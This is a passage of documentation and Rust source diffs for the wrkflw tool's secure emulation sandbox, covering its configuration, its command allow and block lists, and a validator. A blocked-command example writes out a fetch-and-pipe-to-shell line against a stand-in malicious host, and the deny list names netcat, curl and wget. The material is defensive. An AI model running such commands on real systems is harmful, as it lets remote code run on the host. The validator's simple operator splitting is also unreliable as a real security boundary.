SandboxConfig {
max_execution_time: Duration::from_secs(300), // 5 minutes
max_memory_mb: 512, // 512 MB
max_cpu_percent: 80, // 80% CPU
max_processes: 10, // Max 10 processes
allow_network: false, // No network access
strict_mode: true, // Whitelist-only mode
}
```
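The execution-time limit can be pictured as a poll-and-kill loop around the child process. A simplified std-only sketch (the real sandbox also enforces memory and CPU limits, which require platform-specific APIs not shown here):

```rust
use std::process::{Command, Stdio};
use std::time::{Duration, Instant};

// Poll the child until it exits or the deadline passes; kill it on timeout.
// Returns Some(exit_code) on normal exit, None if the process was killed.
fn run_with_timeout(mut cmd: Command, limit: Duration) -> std::io::Result<Option<i32>> {
    let mut child = cmd.stdout(Stdio::null()).stderr(Stdio::null()).spawn()?;
    let deadline = Instant::now() + limit;
    loop {
        if let Some(status) = child.try_wait()? {
            return Ok(status.code()); // finished within the limit
        }
        if Instant::now() >= deadline {
            child.kill()?; // exceeded the max_execution_time budget
            child.wait()?; // reap the killed process
            return Ok(None);
        }
        std::thread::sleep(Duration::from_millis(20));
    }
}

fn main() -> std::io::Result<()> {
    // A fast command completes; a sleeping one is killed at the deadline.
    let fast = run_with_timeout(Command::new("true"), Duration::from_secs(2))?;
    assert_eq!(fast, Some(0));
    let mut slow = Command::new("sleep");
    slow.arg("5");
    let killed = run_with_timeout(slow, Duration::from_millis(200))?;
    assert_eq!(killed, None);
    println!("timeout sketch ok");
    Ok(())
}
```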
### ⚠️ Legacy Emulation Mode (Unsafe)
The original emulation mode executes commands directly on the host system without any sandboxing. **This mode will be deprecated and should only be used for trusted workflows.**
```bash
# Legacy unsafe mode (not recommended)
wrkflw run --runtime emulation .github/workflows/build.yml
```
## Example: Blocked vs Allowed Commands
### ❌ Blocked Commands
```yaml
# This workflow will be blocked in secure emulation mode
steps:
- name: Dangerous command
run: rm -rf /tmp/* # BLOCKED: Dangerous file deletion
- name: System modification
run: sudo apt-get install package # BLOCKED: sudo usage
- name: Network access
run: wget https://malicious-site.com/script.sh | sh # BLOCKED: wget + shell execution
```
### ✅ Allowed Commands
```yaml
# This workflow will run successfully in secure emulation mode
steps:
- name: Build project
run: cargo build --release # ALLOWED: Development tool
- name: Run tests
run: cargo test # ALLOWED: Testing
- name: List files
run: ls -la target/ # ALLOWED: Safe file listing
- name: Format code
run: cargo fmt --check # ALLOWED: Code formatting
```
## Security Warnings and Messages
When dangerous commands are detected, wrkflw provides clear security messages:
```
🚫 SECURITY BLOCK: Command 'rm' is not allowed in secure emulation mode.
This command was blocked for security reasons.
If you need to run this command, please use Docker or Podman mode instead.
```
```
🚫 SECURITY BLOCK: Dangerous command pattern detected: 'rm -rf /'.
This command was blocked because it matches a known dangerous pattern.
Please review your workflow for potentially harmful commands.
```
## Configuration Examples
### Workflow-Friendly Configuration
```rust
use wrkflw_runtime::sandbox::create_workflow_sandbox_config;
let config = create_workflow_sandbox_config();
// - Allows network access for package downloads
// - Higher resource limits for CI/CD workloads
// - Less strict mode for development flexibility
```
### Strict Security Configuration
```rust
use wrkflw_runtime::sandbox::create_strict_sandbox_config;
let config = create_strict_sandbox_config();
// - No network access
// - Very limited command set
// - Low resource limits
// - Strict whitelist-only mode
```
### Custom Configuration
```rust
use wrkflw_runtime::sandbox::{SandboxConfig, Sandbox};
use std::collections::HashSet;
use std::path::PathBuf;
let mut config = SandboxConfig::default();
// Custom allowed commands
config.allowed_commands = ["echo", "ls", "cargo"]
.iter()
.map(|s| s.to_string())
.collect();
// Custom resource limits
config.max_execution_time = Duration::from_secs(60);
config.max_memory_mb = 256;
// Custom allowed paths
config.allowed_write_paths.insert(PathBuf::from("./target"));
config.allowed_read_paths.insert(PathBuf::from("./src"));
let sandbox = Sandbox::new(config)?;
```
## Migration Guide
### From Unsafe Emulation to Secure Emulation
1. **Change Runtime Flag**:
```bash
# Old (unsafe)
wrkflw run --runtime emulation workflow.yml
# New (secure)
wrkflw run --runtime secure-emulation workflow.yml
```
2. **Review Workflow Commands**: Check for any commands that might be blocked and adjust if necessary.
3. **Handle Security Blocks**: If legitimate commands are blocked, consider:
- Using Docker/Podman mode for those specific workflows
- Modifying the workflow to use allowed alternatives
- Creating a custom sandbox configuration
### When to Use Each Mode
| Use Case | Recommended Mode | Reason |
|----------|------------------|---------|
| Local development | Secure Emulation | Good balance of security and convenience |
| Untrusted workflows | Docker/Podman | Maximum isolation |
| CI/CD pipelines | Docker/Podman | Consistent, reproducible environment |
| Testing workflows | Secure Emulation | Fast execution with safety |
| Trusted internal workflows | Secure Emulation | Sufficient security for known-safe code |
## Troubleshooting
### Command Blocked Error
If you encounter a security block:
1. **Check if the command is necessary**: Can you achieve the same result with an allowed command?
2. **Use container mode**: Switch to Docker or Podman mode for unrestricted execution
3. **Modify the workflow**: Use safer alternatives where possible
### Resource Limit Exceeded
If your workflow hits resource limits:
1. **Optimize the workflow**: Reduce resource usage where possible
2. **Use custom configuration**: Increase limits for specific use cases
3. **Use container mode**: For resource-intensive workflows
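If a legitimate workflow genuinely needs more headroom, the limits can be raised in a custom `SandboxConfig` before the sandbox is built. A sketch using the fields and constructors from `sandbox.rs` and `secure_emulation.rs` (exact integration depends on how you wire up the runtime):

```rust
use std::time::Duration;

// Start from the workflow-friendly defaults, then raise only the limits
// that are actually being hit.
let mut config = create_workflow_sandbox_config();
config.max_execution_time = Duration::from_secs(3600); // up from 30 minutes
config.max_memory_mb = 4096;                           // up from 2 GB
config.max_processes = 100;                            // up from 50

let runtime = SecureEmulationRuntime::new_with_config(config)?;
```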
### Path Access Denied
If file access is denied:
1. **Check allowed paths**: Ensure your workflow only accesses permitted directories
2. **Use relative paths**: Work within the project directory
3. **Use container mode**: For workflows requiring system-wide file access
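The path check is a simple prefix test: a path is permitted only if, after canonicalization, it lies under one of the configured roots. A self-contained sketch of that check (illustrative; the real `is_path_allowed` also distinguishes read roots from write roots):

```rust
use std::path::{Path, PathBuf};

/// Simplified path check: grant access only when the canonicalized path
/// sits under one of the allowed root directories.
fn is_path_allowed(path: &Path, allowed_roots: &[PathBuf]) -> bool {
    // Fall back to the raw path if it does not exist and cannot be canonicalized.
    let abs = path.canonicalize().unwrap_or_else(|_| path.to_path_buf());
    allowed_roots.iter().any(|root| abs.starts_with(root))
}

fn main() {
    let allowed = vec![PathBuf::from("/project")];

    assert!(is_path_allowed(Path::new("/project/src/main.rs"), &allowed));
    assert!(!is_path_allowed(Path::new("/etc/passwd"), &allowed));
}
```

Because existing paths are canonicalized before the comparison, symlinks pointing outside an allowed root are resolved first, which is why working with relative paths inside the project directory is the most reliable approach.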
## Best Practices
1. **Default to Secure Mode**: Prefer secure emulation for local development
2. **Test Workflows**: Always test workflows in secure mode before deploying
3. **Review Security Messages**: Pay attention to security blocks and warnings
4. **Use Containers for Production**: Use Docker/Podman for production deployments
5. **Regular Updates**: Keep wrkflw updated for the latest security improvements
## Security Considerations
- Secure emulation mode is designed to prevent **accidental** harmful commands, not to stop **determined** attackers
- For maximum security with untrusted code, always use container modes
- The sandbox is most effective against script errors and typos that could damage your system
- Always review workflows from untrusted sources before execution
## Contributing Security Improvements
If you find security issues or have suggestions for improvements:
1. **Report Security Issues**: Use responsible disclosure for security vulnerabilities
2. **Suggest Command Patterns**: Help improve dangerous pattern detection
3. **Test Edge Cases**: Help us identify bypass techniques
4. **Documentation**: Improve security documentation and examples
---
For more information, see the main [README.md](../../README.md) and [Security Policy](../../SECURITY.md).


@@ -24,6 +24,7 @@ pub trait ContainerRuntime {
) -> Result<String, ContainerError>;
}
#[derive(Debug)]
pub struct ContainerOutput {
pub stdout: String,
pub stderr: String,


@@ -1,6 +1,5 @@
use crate::container::{ContainerError, ContainerOutput, ContainerRuntime};
use async_trait::async_trait;
use logging;
use once_cell::sync::Lazy;
use std::collections::HashMap;
use std::fs;
@@ -9,6 +8,7 @@ use std::process::Command;
use std::sync::Mutex;
use tempfile::TempDir;
use which;
use wrkflw_logging;
// Global collection of resources to clean up
static EMULATION_WORKSPACES: Lazy<Mutex<Vec<PathBuf>>> = Lazy::new(|| Mutex::new(Vec::new()));
@@ -162,9 +162,9 @@ impl ContainerRuntime for EmulationRuntime {
}
// Log more detailed debugging information
logging::info(&format!("Executing command in container: {}", command_str));
logging::info(&format!("Working directory: {}", working_dir.display()));
logging::info(&format!("Command length: {}", command.len()));
wrkflw_logging::info(&format!("Executing command in container: {}", command_str));
wrkflw_logging::info(&format!("Working directory: {}", working_dir.display()));
wrkflw_logging::info(&format!("Command length: {}", command.len()));
if command.is_empty() {
return Err(ContainerError::ContainerExecution(
@@ -174,13 +174,13 @@ impl ContainerRuntime for EmulationRuntime {
// Print each command part separately for debugging
for (i, part) in command.iter().enumerate() {
logging::info(&format!("Command part {}: '{}'", i, part));
wrkflw_logging::info(&format!("Command part {}: '{}'", i, part));
}
// Log environment variables
logging::info("Environment variables:");
wrkflw_logging::info("Environment variables:");
for (key, value) in env_vars {
logging::info(&format!(" {}={}", key, value));
wrkflw_logging::info(&format!(" {}={}", key, value));
}
// Find actual working directory - determine if we should use the current directory instead
@@ -197,7 +197,7 @@ impl ContainerRuntime for EmulationRuntime {
// If found, use that as the working directory
if let Some(path) = workspace_path {
if path.exists() {
logging::info(&format!(
wrkflw_logging::info(&format!(
"Using environment-defined workspace: {}",
path.display()
));
@@ -206,7 +206,7 @@ impl ContainerRuntime for EmulationRuntime {
// Fallback to current directory
let current_dir =
std::env::current_dir().unwrap_or_else(|_| PathBuf::from("."));
logging::info(&format!(
wrkflw_logging::info(&format!(
"Using current directory: {}",
current_dir.display()
));
@@ -215,7 +215,7 @@ impl ContainerRuntime for EmulationRuntime {
} else {
// Fallback to current directory
let current_dir = std::env::current_dir().unwrap_or_else(|_| PathBuf::from("."));
logging::info(&format!(
wrkflw_logging::info(&format!(
"Using current directory: {}",
current_dir.display()
));
@@ -225,7 +225,7 @@ impl ContainerRuntime for EmulationRuntime {
working_dir.to_path_buf()
};
logging::info(&format!(
wrkflw_logging::info(&format!(
"Using actual working directory: {}",
actual_working_dir.display()
));
@@ -233,8 +233,8 @@ impl ContainerRuntime for EmulationRuntime {
// Check if path contains the command (for shell script execution)
let command_path = which::which(command[0]);
match &command_path {
Ok(path) => logging::info(&format!("Found command at: {}", path.display())),
Err(e) => logging::error(&format!(
Ok(path) => wrkflw_logging::info(&format!("Found command at: {}", path.display())),
Err(e) => wrkflw_logging::error(&format!(
"Command not found in PATH: {} - Error: {}",
command[0], e
)),
@@ -246,7 +246,7 @@ impl ContainerRuntime for EmulationRuntime {
|| command_str.starts_with("mkdir ")
|| command_str.starts_with("mv ")
{
logging::info("Executing as shell command");
wrkflw_logging::info("Executing as shell command");
// Execute as a shell command
let mut cmd = Command::new("sh");
cmd.arg("-c");
@@ -264,7 +264,7 @@ impl ContainerRuntime for EmulationRuntime {
let output = String::from_utf8_lossy(&output_result.stdout).to_string();
let error = String::from_utf8_lossy(&output_result.stderr).to_string();
logging::debug(&format!(
wrkflw_logging::debug(&format!(
"Shell command completed with exit code: {}",
exit_code
));
@@ -314,7 +314,7 @@ impl ContainerRuntime for EmulationRuntime {
// Always use the current directory for cargo/rust commands rather than the temporary directory
let current_dir = std::env::current_dir().unwrap_or_else(|_| PathBuf::from("."));
logging::info(&format!(
wrkflw_logging::info(&format!(
"Using project directory for Rust command: {}",
current_dir.display()
));
@@ -326,7 +326,7 @@ impl ContainerRuntime for EmulationRuntime {
if *key == "CARGO_HOME" && value.contains("${CI_PROJECT_DIR}") {
let cargo_home =
value.replace("${CI_PROJECT_DIR}", &current_dir.to_string_lossy());
logging::info(&format!("Setting CARGO_HOME to: {}", cargo_home));
wrkflw_logging::info(&format!("Setting CARGO_HOME to: {}", cargo_home));
cmd.env(key, cargo_home);
} else {
cmd.env(key, value);
@@ -338,7 +338,7 @@ impl ContainerRuntime for EmulationRuntime {
cmd.args(&parts[1..]);
}
logging::debug(&format!(
wrkflw_logging::debug(&format!(
"Executing Rust command: {} in {}",
command_str,
current_dir.display()
@@ -350,7 +350,7 @@ impl ContainerRuntime for EmulationRuntime {
let output = String::from_utf8_lossy(&output_result.stdout).to_string();
let error = String::from_utf8_lossy(&output_result.stderr).to_string();
logging::debug(&format!("Command exit code: {}", exit_code));
wrkflw_logging::debug(&format!("Command exit code: {}", exit_code));
if exit_code != 0 {
let mut error_details = format!(
@@ -405,7 +405,7 @@ impl ContainerRuntime for EmulationRuntime {
let output = String::from_utf8_lossy(&output_result.stdout).to_string();
let error = String::from_utf8_lossy(&output_result.stderr).to_string();
logging::debug(&format!("Command completed with exit code: {}", exit_code));
wrkflw_logging::debug(&format!("Command completed with exit code: {}", exit_code));
if exit_code != 0 {
let mut error_details = format!(
@@ -443,12 +443,12 @@ impl ContainerRuntime for EmulationRuntime {
}
async fn pull_image(&self, image: &str) -> Result<(), ContainerError> {
logging::info(&format!("🔄 Emulation: Pretending to pull image {}", image));
wrkflw_logging::info(&format!("🔄 Emulation: Pretending to pull image {}", image));
Ok(())
}
async fn build_image(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
logging::info(&format!(
wrkflw_logging::info(&format!(
"🔄 Emulation: Pretending to build image {} from {}",
tag,
dockerfile.display()
@@ -543,14 +543,14 @@ pub async fn handle_special_action(action: &str) -> Result<(), ContainerError> {
"latest"
};
logging::info(&format!(
wrkflw_logging::info(&format!(
"🔄 Processing action: {} @ {}",
action_name, action_version
));
// Handle specific known actions with special requirements
if action.starts_with("cachix/install-nix-action") {
logging::info("🔄 Emulating cachix/install-nix-action");
wrkflw_logging::info("🔄 Emulating cachix/install-nix-action");
// In emulation mode, check if nix is installed
let nix_installed = Command::new("which")
@@ -560,56 +560,56 @@ pub async fn handle_special_action(action: &str) -> Result<(), ContainerError> {
.unwrap_or(false);
if !nix_installed {
logging::info("🔄 Emulation: Nix is required but not installed.");
logging::info(
wrkflw_logging::info("🔄 Emulation: Nix is required but not installed.");
wrkflw_logging::info(
"🔄 To use this workflow, please install Nix: https://nixos.org/download.html",
);
logging::info("🔄 Continuing emulation, but nix commands will fail.");
wrkflw_logging::info("🔄 Continuing emulation, but nix commands will fail.");
} else {
logging::info("🔄 Emulation: Using system-installed Nix");
wrkflw_logging::info("🔄 Emulation: Using system-installed Nix");
}
} else if action.starts_with("actions-rs/cargo@") {
// For actions-rs/cargo action, ensure Rust is available
logging::info(&format!("🔄 Detected Rust cargo action: {}", action));
wrkflw_logging::info(&format!("🔄 Detected Rust cargo action: {}", action));
// Verify Rust/cargo is installed
check_command_available("cargo", "Rust/Cargo", "https://rustup.rs/");
} else if action.starts_with("actions-rs/toolchain@") {
// For actions-rs/toolchain action, check for Rust installation
logging::info(&format!("🔄 Detected Rust toolchain action: {}", action));
wrkflw_logging::info(&format!("🔄 Detected Rust toolchain action: {}", action));
check_command_available("rustc", "Rust", "https://rustup.rs/");
} else if action.starts_with("actions-rs/fmt@") {
// For actions-rs/fmt action, check if rustfmt is available
logging::info(&format!("🔄 Detected Rust formatter action: {}", action));
wrkflw_logging::info(&format!("🔄 Detected Rust formatter action: {}", action));
check_command_available("rustfmt", "rustfmt", "rustup component add rustfmt");
} else if action.starts_with("actions/setup-node@") {
// Node.js setup action
logging::info(&format!("🔄 Detected Node.js setup action: {}", action));
wrkflw_logging::info(&format!("🔄 Detected Node.js setup action: {}", action));
check_command_available("node", "Node.js", "https://nodejs.org/");
} else if action.starts_with("actions/setup-python@") {
// Python setup action
logging::info(&format!("🔄 Detected Python setup action: {}", action));
wrkflw_logging::info(&format!("🔄 Detected Python setup action: {}", action));
check_command_available("python", "Python", "https://www.python.org/downloads/");
} else if action.starts_with("actions/setup-java@") {
// Java setup action
logging::info(&format!("🔄 Detected Java setup action: {}", action));
wrkflw_logging::info(&format!("🔄 Detected Java setup action: {}", action));
check_command_available("java", "Java", "https://adoptium.net/");
} else if action.starts_with("actions/checkout@") {
// Git checkout action - this is handled implicitly by our workspace setup
logging::info("🔄 Detected checkout action - workspace files are already prepared");
wrkflw_logging::info("🔄 Detected checkout action - workspace files are already prepared");
} else if action.starts_with("actions/cache@") {
// Cache action - can't really emulate caching effectively
logging::info(
wrkflw_logging::info(
"🔄 Detected cache action - caching is not fully supported in emulation mode",
);
} else {
// Generic action we don't have special handling for
logging::info(&format!(
wrkflw_logging::info(&format!(
"🔄 Action '{}' has no special handling in emulation mode",
action_name
));
@@ -628,12 +628,12 @@ fn check_command_available(command: &str, name: &str, install_url: &str) {
.unwrap_or(false);
if !is_available {
logging::warning(&format!("{} is required but not found on the system", name));
logging::info(&format!(
wrkflw_logging::warning(&format!("{} is required but not found on the system", name));
wrkflw_logging::info(&format!(
"To use this action, please install {}: {}",
name, install_url
));
logging::info(&format!(
wrkflw_logging::info(&format!(
"Continuing emulation, but {} commands will fail",
name
));
@@ -642,7 +642,7 @@ fn check_command_available(command: &str, name: &str, install_url: &str) {
if let Ok(output) = Command::new(command).arg("--version").output() {
if output.status.success() {
let version = String::from_utf8_lossy(&output.stdout);
logging::info(&format!("🔄 Using system {}: {}", name, version.trim()));
wrkflw_logging::info(&format!("🔄 Using system {}: {}", name, version.trim()));
}
}
}
@@ -708,7 +708,7 @@ async fn cleanup_processes() {
};
for pid in processes_to_cleanup {
logging::info(&format!("Cleaning up emulated process: {}", pid));
wrkflw_logging::info(&format!("Cleaning up emulated process: {}", pid));
#[cfg(unix)]
{
@@ -747,7 +747,7 @@ async fn cleanup_workspaces() {
};
for workspace_path in workspaces_to_cleanup {
logging::info(&format!(
wrkflw_logging::info(&format!(
"Cleaning up emulation workspace: {}",
workspace_path.display()
));
@@ -755,8 +755,8 @@ async fn cleanup_workspaces() {
// Only attempt to remove if it exists
if workspace_path.exists() {
match fs::remove_dir_all(&workspace_path) {
Ok(_) => logging::info("Successfully removed workspace directory"),
Err(e) => logging::error(&format!("Error removing workspace: {}", e)),
Ok(_) => wrkflw_logging::info("Successfully removed workspace directory"),
Err(e) => wrkflw_logging::error(&format!("Error removing workspace: {}", e)),
}
}


@@ -2,3 +2,5 @@
pub mod container;
pub mod emulation;
pub mod sandbox;
pub mod secure_emulation;


@@ -0,0 +1,672 @@
use regex::Regex;
use std::collections::HashSet;
use std::fs;
use std::path::{Path, PathBuf};
use std::process::{Command, Stdio};
use std::time::Duration;
use tempfile::TempDir;
use wrkflw_logging;
/// Configuration for sandbox execution
#[derive(Debug, Clone)]
pub struct SandboxConfig {
/// Maximum execution time for commands
pub max_execution_time: Duration,
/// Maximum memory usage in MB
pub max_memory_mb: u64,
/// Maximum CPU usage percentage
pub max_cpu_percent: u64,
/// Allowed commands (whitelist)
pub allowed_commands: HashSet<String>,
/// Blocked commands (blacklist)
pub blocked_commands: HashSet<String>,
/// Allowed file system paths (read-only)
pub allowed_read_paths: HashSet<PathBuf>,
/// Allowed file system paths (read-write)
pub allowed_write_paths: HashSet<PathBuf>,
/// Whether to enable network access
pub allow_network: bool,
/// Maximum number of processes
pub max_processes: u32,
/// Whether to enable strict mode (more restrictive)
pub strict_mode: bool,
}
impl Default for SandboxConfig {
fn default() -> Self {
let mut allowed_commands = HashSet::new();
// Basic safe commands
allowed_commands.insert("echo".to_string());
allowed_commands.insert("printf".to_string());
allowed_commands.insert("cat".to_string());
allowed_commands.insert("head".to_string());
allowed_commands.insert("tail".to_string());
allowed_commands.insert("grep".to_string());
allowed_commands.insert("sed".to_string());
allowed_commands.insert("awk".to_string());
allowed_commands.insert("sort".to_string());
allowed_commands.insert("uniq".to_string());
allowed_commands.insert("wc".to_string());
allowed_commands.insert("cut".to_string());
allowed_commands.insert("tr".to_string());
allowed_commands.insert("which".to_string());
allowed_commands.insert("pwd".to_string());
allowed_commands.insert("env".to_string());
allowed_commands.insert("date".to_string());
allowed_commands.insert("basename".to_string());
allowed_commands.insert("dirname".to_string());
// File operations (safe variants)
allowed_commands.insert("ls".to_string());
allowed_commands.insert("find".to_string());
allowed_commands.insert("mkdir".to_string());
allowed_commands.insert("touch".to_string());
allowed_commands.insert("cp".to_string());
allowed_commands.insert("mv".to_string());
// Development tools
allowed_commands.insert("git".to_string());
allowed_commands.insert("cargo".to_string());
allowed_commands.insert("rustc".to_string());
allowed_commands.insert("rustfmt".to_string());
allowed_commands.insert("clippy".to_string());
allowed_commands.insert("npm".to_string());
allowed_commands.insert("yarn".to_string());
allowed_commands.insert("node".to_string());
allowed_commands.insert("python".to_string());
allowed_commands.insert("python3".to_string());
allowed_commands.insert("pip".to_string());
allowed_commands.insert("pip3".to_string());
allowed_commands.insert("java".to_string());
allowed_commands.insert("javac".to_string());
allowed_commands.insert("maven".to_string());
allowed_commands.insert("gradle".to_string());
allowed_commands.insert("go".to_string());
allowed_commands.insert("dotnet".to_string());
// Compression tools
allowed_commands.insert("tar".to_string());
allowed_commands.insert("gzip".to_string());
allowed_commands.insert("gunzip".to_string());
allowed_commands.insert("zip".to_string());
allowed_commands.insert("unzip".to_string());
let mut blocked_commands = HashSet::new();
// Dangerous system commands
blocked_commands.insert("rm".to_string());
blocked_commands.insert("rmdir".to_string());
blocked_commands.insert("dd".to_string());
blocked_commands.insert("mkfs".to_string());
blocked_commands.insert("fdisk".to_string());
blocked_commands.insert("mount".to_string());
blocked_commands.insert("umount".to_string());
blocked_commands.insert("sudo".to_string());
blocked_commands.insert("su".to_string());
blocked_commands.insert("passwd".to_string());
blocked_commands.insert("chown".to_string());
blocked_commands.insert("chmod".to_string());
blocked_commands.insert("chgrp".to_string());
blocked_commands.insert("chroot".to_string());
// Network and system tools
blocked_commands.insert("nc".to_string());
blocked_commands.insert("netcat".to_string());
blocked_commands.insert("wget".to_string());
blocked_commands.insert("curl".to_string());
blocked_commands.insert("ssh".to_string());
blocked_commands.insert("scp".to_string());
blocked_commands.insert("rsync".to_string());
// Process control
blocked_commands.insert("kill".to_string());
blocked_commands.insert("killall".to_string());
blocked_commands.insert("pkill".to_string());
blocked_commands.insert("nohup".to_string());
blocked_commands.insert("screen".to_string());
blocked_commands.insert("tmux".to_string());
// System modification
blocked_commands.insert("systemctl".to_string());
blocked_commands.insert("service".to_string());
blocked_commands.insert("crontab".to_string());
blocked_commands.insert("at".to_string());
blocked_commands.insert("reboot".to_string());
blocked_commands.insert("shutdown".to_string());
blocked_commands.insert("halt".to_string());
blocked_commands.insert("poweroff".to_string());
Self {
max_execution_time: Duration::from_secs(300), // 5 minutes
max_memory_mb: 512,
max_cpu_percent: 80,
allowed_commands,
blocked_commands,
allowed_read_paths: HashSet::new(),
allowed_write_paths: HashSet::new(),
allow_network: false,
max_processes: 10,
strict_mode: true,
}
}
}
/// Sandbox error types
#[derive(Debug, thiserror::Error)]
pub enum SandboxError {
#[error("Command blocked by security policy: {command}")]
BlockedCommand { command: String },
#[error("Dangerous command pattern detected: {pattern}")]
DangerousPattern { pattern: String },
#[error("Path access denied: {path}")]
PathAccessDenied { path: String },
#[error("Resource limit exceeded: {resource}")]
ResourceLimitExceeded { resource: String },
#[error("Execution timeout after {seconds} seconds")]
ExecutionTimeout { seconds: u64 },
#[error("Sandbox setup failed: {reason}")]
SandboxSetupError { reason: String },
#[error("Command execution failed: {reason}")]
ExecutionError { reason: String },
}
/// Secure sandbox for executing commands in emulation mode
pub struct Sandbox {
config: SandboxConfig,
workspace: TempDir,
dangerous_patterns: Vec<Regex>,
}
impl Sandbox {
/// Create a new sandbox with the given configuration
pub fn new(config: SandboxConfig) -> Result<Self, SandboxError> {
let workspace = tempfile::tempdir().map_err(|e| SandboxError::SandboxSetupError {
reason: format!("Failed to create sandbox workspace: {}", e),
})?;
let dangerous_patterns = Self::compile_dangerous_patterns();
wrkflw_logging::info(&format!(
"Created new sandbox with workspace: {}",
workspace.path().display()
));
Ok(Self {
config,
workspace,
dangerous_patterns,
})
}
/// Execute a command in the sandbox
pub async fn execute_command(
&self,
command: &[&str],
env_vars: &[(&str, &str)],
working_dir: &Path,
) -> Result<crate::container::ContainerOutput, SandboxError> {
if command.is_empty() {
return Err(SandboxError::ExecutionError {
reason: "Empty command".to_string(),
});
}
let command_str = command.join(" ");
// Step 1: Validate command
self.validate_command(&command_str)?;
// Step 2: Setup sandbox environment
let sandbox_dir = self.setup_sandbox_environment(working_dir)?;
// Step 3: Execute with limits
self.execute_with_limits(command, env_vars, &sandbox_dir)
.await
}
/// Validate that a command is safe to execute
fn validate_command(&self, command_str: &str) -> Result<(), SandboxError> {
// Check for dangerous patterns first
for pattern in &self.dangerous_patterns {
if pattern.is_match(command_str) {
wrkflw_logging::warning(&format!(
"🚫 Blocked dangerous command pattern: {}",
command_str
));
return Err(SandboxError::DangerousPattern {
pattern: command_str.to_string(),
});
}
}
// Split command by shell operators to validate each part
let command_parts = self.split_shell_command(command_str);
for part in command_parts {
let part = part.trim();
if part.is_empty() {
continue;
}
// Extract the base command from this part
let base_command = part.split_whitespace().next().unwrap_or("");
let command_name = Path::new(base_command)
.file_name()
.and_then(|s| s.to_str())
.unwrap_or(base_command);
// Skip shell built-ins and operators
if self.is_shell_builtin(command_name) {
continue;
}
// Check blocked commands
if self.config.blocked_commands.contains(command_name) {
wrkflw_logging::warning(&format!("🚫 Blocked command: {}", command_name));
return Err(SandboxError::BlockedCommand {
command: command_name.to_string(),
});
}
// In strict mode, only allow whitelisted commands
if self.config.strict_mode && !self.config.allowed_commands.contains(command_name) {
wrkflw_logging::warning(&format!(
"🚫 Command not in whitelist (strict mode): {}",
command_name
));
return Err(SandboxError::BlockedCommand {
command: command_name.to_string(),
});
}
}
wrkflw_logging::info(&format!("✅ Command validation passed: {}", command_str));
Ok(())
}
/// Split shell command by operators while preserving quoted strings
fn split_shell_command(&self, command_str: &str) -> Vec<String> {
// Simple split by common shell operators
// This is not a full shell parser but handles most cases
let separators = ["&&", "||", ";", "|"];
let mut parts = vec![command_str.to_string()];
for separator in separators {
let mut new_parts = Vec::new();
for part in parts {
let split_parts: Vec<String> = part
.split(separator)
.map(|s| s.trim().to_string())
.filter(|s| !s.is_empty())
.collect();
new_parts.extend(split_parts);
}
parts = new_parts;
}
parts
}
/// Check if a command is a shell built-in
fn is_shell_builtin(&self, command: &str) -> bool {
let builtins = [
"true", "false", "test", "[", "echo", "printf", "cd", "pwd", "export", "set", "unset",
"alias", "history", "jobs", "fg", "bg", "wait", "read",
];
builtins.contains(&command)
}
/// Setup isolated sandbox environment
fn setup_sandbox_environment(&self, working_dir: &Path) -> Result<PathBuf, SandboxError> {
let sandbox_root = self.workspace.path();
let sandbox_workspace = sandbox_root.join("workspace");
// Create sandbox directory structure
fs::create_dir_all(&sandbox_workspace).map_err(|e| SandboxError::SandboxSetupError {
reason: format!("Failed to create sandbox workspace: {}", e),
})?;
// Copy allowed files to sandbox (if working_dir exists and is allowed)
if working_dir.exists() && self.is_path_allowed(working_dir, false) {
self.copy_safe_files(working_dir, &sandbox_workspace)?;
}
wrkflw_logging::info(&format!(
"Sandbox environment ready: {}",
sandbox_workspace.display()
));
Ok(sandbox_workspace)
}
/// Copy files safely to sandbox, excluding dangerous files
fn copy_safe_files(&self, source: &Path, dest: &Path) -> Result<(), SandboxError> {
for entry in fs::read_dir(source).map_err(|e| SandboxError::SandboxSetupError {
reason: format!("Failed to read source directory: {}", e),
})? {
let entry = entry.map_err(|e| SandboxError::SandboxSetupError {
reason: format!("Failed to read directory entry: {}", e),
})?;
let path = entry.path();
let file_name = path.file_name().and_then(|s| s.to_str()).unwrap_or("");
// Skip dangerous or sensitive files
if self.should_skip_file(file_name) {
continue;
}
let dest_path = dest.join(file_name);
if path.is_file() {
fs::copy(&path, &dest_path).map_err(|e| SandboxError::SandboxSetupError {
reason: format!("Failed to copy file: {}", e),
})?;
} else if path.is_dir() && !self.should_skip_directory(file_name) {
fs::create_dir_all(&dest_path).map_err(|e| SandboxError::SandboxSetupError {
reason: format!("Failed to create directory: {}", e),
})?;
self.copy_safe_files(&path, &dest_path)?;
}
}
Ok(())
}
/// Execute command with resource limits and monitoring
async fn execute_with_limits(
&self,
command: &[&str],
env_vars: &[(&str, &str)],
working_dir: &Path,
) -> Result<crate::container::ContainerOutput, SandboxError> {
// Join command parts and execute via shell for proper handling of operators
let command_str = command.join(" ");
let mut cmd = Command::new("sh");
cmd.arg("-c");
cmd.arg(&command_str);
cmd.current_dir(working_dir);
cmd.stdout(Stdio::piped());
cmd.stderr(Stdio::piped());
// Set environment variables (filtered)
for (key, value) in env_vars {
if self.is_env_var_safe(key) {
cmd.env(key, value);
}
}
// Add sandbox-specific environment variables
cmd.env("WRKFLW_SANDBOXED", "true");
cmd.env("WRKFLW_SANDBOX_MODE", "strict");
// Execute with timeout
let timeout_duration = self.config.max_execution_time;
wrkflw_logging::info(&format!(
"🏃 Executing sandboxed command: {} (timeout: {}s)",
command.join(" "),
timeout_duration.as_secs()
));
let start_time = std::time::Instant::now();
let result = tokio::time::timeout(timeout_duration, async {
let output = cmd.output().map_err(|e| SandboxError::ExecutionError {
reason: format!("Command execution failed: {}", e),
})?;
Ok(crate::container::ContainerOutput {
stdout: String::from_utf8_lossy(&output.stdout).to_string(),
stderr: String::from_utf8_lossy(&output.stderr).to_string(),
exit_code: output.status.code().unwrap_or(-1),
})
})
.await;
let execution_time = start_time.elapsed();
match result {
Ok(output_result) => {
wrkflw_logging::info(&format!(
"✅ Sandboxed command completed in {:.2}s",
execution_time.as_secs_f64()
));
output_result
}
Err(_) => {
wrkflw_logging::warning(&format!(
"⏰ Sandboxed command timed out after {:.2}s",
timeout_duration.as_secs_f64()
));
Err(SandboxError::ExecutionTimeout {
seconds: timeout_duration.as_secs(),
})
}
}
}
/// Check if a path is allowed for access
fn is_path_allowed(&self, path: &Path, write_access: bool) -> bool {
let abs_path = path.canonicalize().unwrap_or_else(|_| path.to_path_buf());
if write_access {
self.config
.allowed_write_paths
.iter()
.any(|allowed| abs_path.starts_with(allowed))
} else {
self.config
.allowed_read_paths
